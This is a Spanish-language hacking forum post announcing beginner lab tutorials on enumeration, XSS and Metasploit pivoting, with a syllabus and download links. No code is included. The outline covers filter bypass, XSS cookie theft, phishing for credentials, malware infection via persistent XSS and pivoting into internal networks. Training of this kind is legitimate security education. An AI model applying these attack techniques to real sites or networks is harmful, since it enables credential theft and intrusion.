En este lab no se basó en conexiones nulas o anónimas ya que se requeriría de maquinas con windows 2000 o NT, que son las que poseen este tipo de vulnerabilidades, que actualmente se encuentran ya parchadas en el Windows XP.


- Tuto 1.

En el primer vídeo pueden observar la forma en que se deben configurar las maquinas virtuales, las configuraciones adopatas y que comandos usar para la enumeración del objetivo.

Name:   tuto1_lab2.rar
Size:   36.2MB (37923264 bytes)
Modified:   2011-07-27 05:05:12
md5:   a745467be6fcd7a492ecd6cddb6c7cb7
URL:   http://www.adrive.com/public/5raCGc/tuto1_lab2.rar
Expires:   2012-06-12


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Laboratorio 3 Hack Novato

Estos laboratorios los veremos paso por paso, así que si están interesados les iré montando manuales de lo que deben ir realizando, se responderán dudas a inquietudes y compartir experiencias.

El tema a tratar es la vulnerabilidad XSS y el temario sería el siguiente

1.conceptos generales
1.1 cross site scripting
1.2 cookies
1.3 Phishing
1.4 Virtualizacion
1.5 easyphp
1.6 javascript

2.Creando los ambientes
2.1 Servidor vulnerable
2.2 Hosting
2.3 Victima/Atacante


3.Desarrollo del Laboratorio
3.1 Comprobar vulnerabilidad
3.2 Saltando Filtros
3.2.1 Bloqueo del numero maximo de caracteres(maxlength)
3.2.2 Filtro Strip_Tags
3.2.3 Magic_quotes_gpc =on
3.2.4 Metodo Post (Url maligna)
3.3 Ataques Cross Site Scripting (XSS)
3.3.1 Algunos codigos maliciosos
3.3.2 XSS Persistente
3.3.3 Robo de Cookies por medio de vulnerabilidad XSS
3.3.3.1 Robo de cookie para almacenar en un .txt
3.3.3.2 Robo de cookie para almacenar en una Base de Datos
3.3.4 Ataque XSS reflejado usando tecnica de Phishing (obteniendo log y password
3.3.5 AtaqUE xss Persistente para infeccion con malware (usando tecnica de phishing)

Para acceder al archivo .pdf que contiene la totalidad del laboratorio, debe realizar la descarga desde el siguiente link:

Guia:

Name:   Guia_XSS.pdf
Size:   3.6MB (3762235 bytes)
Modified:   2011-07-27 05:05:12
md5:   177fcae7e33e8cfcf0476552133281cd
URL: http://www.adrive.com/public/h6Uybp/Guia_XSS.pdf
Expires:   2012-06-12


Archivos Máquina virtual Hosting:

Name:   Arch_Hosting.rar
Size:   167.7KB (171706 bytes)
Modified:   2011-07-27 05:05:13
md5:   24e8ed91e34dfcce963c8197ce43d677
URL: http://www.adrive.com/public/bTBP72/Arch_Hosting.rar
Expires:   2012-06-12

Archivos Máquina virtual Servidor:

Name:   serv.rar
Size:   6MB (6327140 bytes)
Modified:   2011-07-27 05:05:13
md5:   e602c03cdf614ca9086cc7c40fc88b3c
URL:   http://www.adrive.com/public/HKFAuG/serv.rar
Expires:   2012-06-12

================================================== ========

Laboratorio 4 PIVOTING (Metasploit)

Los siguientes 3 videos tienen como fin mostrar una forma de ingresar a un servidor ubicado en la red Interna de una "empresa", cuando se compromete el servidor que está publicado a Internet, desde el equipo de cómputo del atacante, sin tener que instalar herramientas en el primer servidor comprometido.

La técnica utilizada se conoce como PIVOTING.

"Pivoting es una técnica que utiliza una única instancia que sea capaz de "mover" cualquier tipo de trafico en una red. (también conocida como 'plant' o 'foothold'). Básicamente utilizando el primer compromiso, por ejemplo, nos permite e incluso nos ayuda en la penetración de otros sistemas inaccesibles."
Fuente: Pivoting - www.metasploit-es.com.ar

Video 1.: En este video se detalla el escenario en el que se desarrolla el ataque.
Name:   escenario.zip
Size:   18.5MB (19403607 bytes)
Uploaded:   2012-03-11 19:39:23
md5:   9cf9b8a670b5419a1f7c2c9387602772
URL:   http://www.adrive.com/public/nGK2Hy/escenario.zip
Expires:   2012-06-09

Video 2.: En este video se detalla la forma en que se compromete el primer servidor, mediante el uso de la herramienta "armitage" de metasploit.
Name:   compro1server.zip
Size:   27.9MB (29209507 bytes)
Uploaded:   2012-03-11 19:46:34
md5:   4db9405ed6ad6cf78b3f54023eb5653b
URL:   http://www.adrive.com/public/WydqMn/compro1server.zip
Expires:   2012-06-09

Video 3.: En este video se detalla el uso de la técnica de PIVOTING, donde se compromete el segundo Servidor ubicado en la red Lan de la "empresa".
Name:   pivoting.zip
Size:   35.3MB (36988812 bytes)
Uploaded:   2012-03-11 20:12:56
md5:   8d39399067a78d227be339a1d0ced16b
URL: http://www.adrive.com/public/AfFCAz/pivoting.zip
Expires:   2012-06-09

=============================================================================================
Saludos

Mirrors alternos

http://www.mediafire.com/download.php?yc6bq5bgc73dkrz

http://www.mediafire.com/download.php?2xfc9yb552lrdr3

http://www.mediafire.com/view/?5twtqhid8f197f8

http://www.mediafire.com/download.php?zmrmv0gprsvw7lm

http://www.mediafire.com/view/?o5e38dsj18xsrby

http://www.mediafire.com/download.php?mypv75cwm62bdku

http://www.mediafire.com/download.php?tly8ppy9tc5c01t

http://www.mediafire.com/download.php?pogdc69pycuyim0

http://www.mediafire.com/download.php?w2aksji37hs5ps1

http://www.mediafire.com/download.php?e8ouehzp9lvjxd2

http://www.mediafire.com/download.php?cii2um5x8c3sfr5

Gracias a Quisqueyano por los mirrors :D

ATTE: Snifer

Páginas: [1] 2